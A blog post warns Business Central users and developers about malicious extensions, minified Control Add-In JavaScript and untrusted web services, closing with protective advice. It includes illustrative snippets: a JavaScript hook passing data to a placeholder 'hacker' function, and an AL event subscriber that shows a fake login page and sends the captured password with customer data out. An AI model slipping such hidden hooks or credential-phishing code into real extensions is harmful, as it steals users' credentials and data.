I feel like this is the elephant in the room that everyone seems to ignore. How to make sure your Business Central extensions are secure. Ever since we moved into extensions our world has become so much bigger, we have API’s, we can call REST webservices from AL. There are so many cool things available, near unlimited possibilities for hackers to steal you data.

I got into a bit of a discussion with someone on LinkedIn after my recent post on React builds in Control Add-Ins. The heart of it was that compiled JavaScript can contain a multitude of nastiness that is near impossible to spot. This is true but it is also true of extensions. In this blog post I will give some examples of nastiness a careless or unscrupulous developer can create.

First things first, compiled JavaScript. Lets say you ask someone to create a script for your Control Add-In. Let’s say that someone uses React and sends you a compiled script. Everything works, looks pretty and you are happy. However, this was added to your JavaScript:

window.InitControls = (myBCData) => {
 sendToMyHackerBuddies(myBCData);
 processInitControls(myBCData);
}

This, obviously, is a pretty hamfisted example. Easy to spot right? Lets have a look at the compiled code:

window.InitControls=function(e,n){sendToMyHackerBuddies(void 0),p(e)|

Just to give you some context, this particular file holds a single line of 3331 characters of nearly illegible JavsScript. It is impossible to find even this hamfisted example if you don’t know where to look. What if your developer decided to call a function in some piece of script someone posted somewhere? You simply won’t find it.

Second example. You ask someone to create an extension for you. They build it, you test it, everything works, everyone happy right? But what if that developer added this event subscriber and then set ShowMyCode to false?

[EventSubscriber(ObjectType::Table, Database::Customer, 'OnAfterInsertEvent', '', true, true)]
 local procedure CustomerOnInsert(var Rec: Record Customer; RunTrigger: Boolean)
 var
   User: Record User;
   FakeLoginpage: Page "Fake Login Page";
   Password: Text;
 begin
   if User.Get(UserSecurityId()) then;
   FakeLoginpage.RunModal();
   Password := FakeLoginPage.GetPassword();
   SendToMyHackerBuddies(Rec, UserId, GetUrl(ClientType::Api), User."Authentication Email", Password);
 end;

Disaster right? You are one fishing trip away from exposing your entire database to god knows who. What if you simply downloaded an extension someone posted somewhere thinking it would fix your problems?

Third scenario, you call a webservice in order to find the weather conditions on your customers location. Instead of finding a premium trusted API you use the free service you find on webservice.weather.myfriendlyhacker.com/api. It will no doubt return perfectly valid weather data. It will also log all your data and sell it to the highest bidder.

I hope these simple scenarios make you think twice about trust and ease of development. Please remember that Business Central is probably not big enough to be targeted by the really really clever Internet criminals. That will change.

Now for the million dollar question. Will this stop me from using React front ends, extensions, and web services. Of course not. They bring us many good things. But I am mindful of who to trust. I don’t just add any old scripts to my front ends, and I certainly don’t send customer data to random web services.

To my fellow developers, your customers trust you to keep their data secure. Please be mindful of this, earn their trust.

To end users. There are a few simple ways of protecting yourselves.

  • Work only with developers that you know and trust
  • Never install extensions from untrusted sources
  • When you commission someone to create a per tenant extension insist that the source code is visible
  • Where possible insist that code is reviewed by an independent third party
  • Set up your security properly.
  • When in doubt, don’t.

What do you use to protect yourselves? Please let me know in the comments.

Photo by Sam Balye on Unsplash

About the Author René Brummel

My driving force is the will to learn. Every day brings its unique challenges, my goal is to rise to each challenge and learn from it. My professional expertise is the streamlining and optimization of business processes. My experience ranges from software development (I know AL, C/AL, C#, .NET, JavaScript, ReactJS etc) and implementation to business processes optimization, project management, training, and coaching. At the heart of what I do lies my vision, “sustainable change comes from conscious choice, made out of free will”.

One comment

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: